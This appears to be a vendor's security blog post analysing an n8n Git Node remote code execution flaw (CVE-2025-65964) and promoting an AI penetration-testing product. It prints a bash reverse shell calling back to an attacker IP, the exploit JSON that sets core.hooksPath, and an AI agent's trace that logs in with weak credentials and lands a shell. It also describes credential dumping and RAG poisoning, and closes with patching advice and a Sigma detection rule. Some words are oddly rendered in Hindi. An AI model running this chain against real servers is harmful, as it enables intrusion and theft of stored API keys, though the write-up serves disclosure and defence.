In the rapidly evolving landscape of AI security, the industry often fixates on adversarial attacks against Large Language Models (like prompt injection), while neglecting the crumbling “skeleton” that holds these agents together—the Orchestration Layer.

On December 8, 2025, the security community disclosed CVE-2025-65964, a critical Remote Code Execution (RCE) vulnerability in n8n, the world’s most popular open-source workflow automation tool. With a CVSS v4 score of 9.4 (Critical), this flaw is not just another web bug. It represents a sophisticated abuse of Git’s underlying configuration logic, weaponizing legitimate version control operations to compromise the central nervous system of modern AI stacks.

This article moves beyond the generic advisory. From a hardcore Red Team perspective, we will dissect the full Exploit Chain, the root cause, and why this is the quintessential “Agentic Supply Chain Attack.”

The Context: When Git Becomes the Vector

n8n has become a cornerstone of modern AI applications, used extensively to glue together LLMs (like GPT-5), Vector Databases (like Pinecone), and internal APIs. To support CI/CD and version control for workflows, n8n ships with a powerful, built-in Git Node.

The core of CVE-2025-65964 lies in the failure of the n8n Git Node to sanitize configuration keys during the addConfig operation. Attackers leverage this oversight to override the core.hooksPath configuration, effectively hijacking the execution flow of the Git binary.

Understanding core.hooksPath

In a standard Git architecture, hooks (scripts executed on events like commit, checkout, merge) are stored in the repository’s .git/hooks directory. For security reasons, Git does not replicate these hooks when cloning a repository.

However, Git 2.9 introduced the core.hooksPath configuration option, which allows users to define a custom path for hooks anywhere on the filesystem.

If an attacker can control this configuration key and point it to a directory they have write access to (e.g., /tmp/ or a file upload directory), the next time n8n performs any Git operation, Git breaks out of its sandbox and executes the attacker’s script.

The Exploit Chain: A Logic Bug Masterclass

A successful exploit requires more than a single payload; it requires “Logic Orchestration.” Below is the step-by-step reproduction of the attack from our research lab.

Phase 1: Reconnaissance & Access

The attacker first gains access to the n8n workflow editor. In many corporate intranets, n8n is deployed by AI engineers and data scientists, often lacking strict authentication or sitting behind weak default credentials.

Target Confirmation: 0.123.1 <= n8n Version < 1.119.2.

Phase 2: Staging the Payload

Since core.hooksPath points to a directory, the attacker must first plant an executable script with a specific Git hook name (e.g., post-checkout) in a writable location.

Using n8n’s “Write Binary File” node (or an “Execute Command” node if not hardened), the attacker drops a malicious script.

Malicious Script Example (/tmp/pwn/post-checkout):

Bash

`#!/bin/bash

A reverse shell payload

Executed silently after a Git checkout operation

/bin/bash -i >& /dev/tcp/10.10.10.5/4444 0>&1`

Phase 3: Configuration Injection

This is the trigger point. The attacker creates a Git Node and selects the “Add Config” operation. Normally, users configure user.name या user.email. However, by manipulating the JSON parameters directly, the attacker injects the dangerous key.

The Exploit JSON Payload:

JSON

{ "parameters": { "operation": "addConfig", "configName": "core.hooksPath", "configValue": "/tmp/pwn", "repositoryPath": "/home/node/.n8n/git/workflow_repo" }, "name": "Weaponized_Git_Config", "type": "n8n-nodes-base.git", "typeVersion": 1, "position": [460, 300] }

When this node executes, the underlying n8n process runs:

git config –file /home/node/.n8n/git/workflow_repo/.git/config core.hooksPath /tmp/pwn

Phase 4: The Trigger

Once the configuration is set, it is persistent. The attacker simply adds another Git Node to the workflow to perform a benign operation, such as git checkout master or git status.

Sequence: Git Process Starts -> Reads core.hooksPath -> Loads /tmp/pwn/post-checkout -> RCE Executed.

Why This Is an AI Infrastructure Nightmare

For security engineers, understanding the impact is more critical than the bug itself. In the AI era, an n8n server is not just a web service; it is a Key Vault.

1. Credential Dumping: The n8n database contains encrypted API keys for OpenAI, AWS Bedrock, Snowflake, and Slack. With shell access, an attacker can decrypt these credentials (often found in ~/.n8n/database.sqlite), leading to a total compromise of the enterprise cloud environment.
2. RAG Poisoning: Attackers can hijack the workflows that write to Vector Databases. By injecting malicious knowledge snippets, they can manipulate the output of internal corporate RAG systems, facilitating deep social engineering or disinformation campaigns.
3. Container Escape Risks: Many n8n deployments run with elevated privileges (or –privileged) to allow Python libraries like LangChain to interact with the system. In such cases, RCE inside the container is functionally equivalent to Root on the host.

The Penligent Case Study: Agent vs. Agent

At पेनलिजेंट.ai, we classify this as a “Logic Flaw.” Traditional DAST scanners fail to detect CVE-2025-65964 because:

• Scanners do not know how to “build a workflow.”
• Scanners cannot understand the temporal logic of “Write File first, Configure Git second.”

Penligent’s automated penetration testing agents, however, demonstrate reasoning capabilities that mimic advanced human attackers.

[Penligent Agent Internal Trace – 2025-12-09 14:02:33]

Observation: Target port 5678 open. Identified as n8n. Weak credentials bypass successful.

Reasoning: Detected Git Node capability. Knowledge base indicates risk of Git Config injection. Direct command execution is blocked. Can I achieve execution via environment or config manipulation?

Action Plan:

1. Attempt Execute Command to verify egress (Failed, node disabled).
2. Pivot Strategy: Search for file write primitives. Write Binary File node is available.
3. Construct Exploit Chain: Write reverse shell to /tmp/.git-hooks -> Inject core.hooksPath via Git Node -> Trigger Git Log.Execution: Running workflow ID pwn_test_01.Result: Reverse shell callback received. Vulnerability verified.

This is the core value proposition of पेनलिजेंट: Using AI to fight AI. Our agents don’t just match fingerprints; they understand business logic and simulate high-tier adversary tradecraft within a safe sandbox.

Defense & Detection

उपचार

• Patch Immediately: Upgrade n8n to version 1.119.2 or later. The new version implements a strict allowlist for addConfig keys.
• Hardening: Use the N8N_NODES_EXCLUDE=["n8n-nodes-base.git"] environment variable in your Docker setup to completely disable the Git node if it is not mission-critical.

Threat Hunting

If you suspect a breach, audit the .git/config files on your n8n servers.

Sigma Detection Rule Example:

YAML

title: Suspicious Git Config Modification via n8n status: experimental logsource: category: process_creation product: linux detection: selection: ParentImage|endswith: '/node' Image|endswith: '/git' CommandLine|contains: - 'config' - 'core.hooksPath' condition: selection level: high

Any Git command spawned by a Node.js process attempting to modify core.hooksPath should be treated as a high-fidelity indicator of compromise (IoC).

निष्कर्ष

CVE-2025-65964 proves once again that as software development shifts toward “Agent Native” architectures, traditional boundaries are blurring. The flexibility of our tools is often the greatest enemy of security.

For the hardcore security engineer, the battlefield has shifted from the Web Frontend to the Orchestration Backend. Don’t just watch the HTTP requests; watch the workflows running silently in the background. Watch the automated Git operations. This is the frontline of 2025.

If your team lacks the manpower to manually verify such complex logic risks, it might be time to bring in पेनलिजेंट—the intelligent digital red teamer that holds the line in the age of AI.

Internal Links / References:

• NVD – CVE-2025-65964 Detail (Authoritative Source)
• GitHub Security Advisory: RCE in n8n via Git Node
• Git Documentation: core.hooksPath
• Penligent.ai – The World’s First Agentic Hacker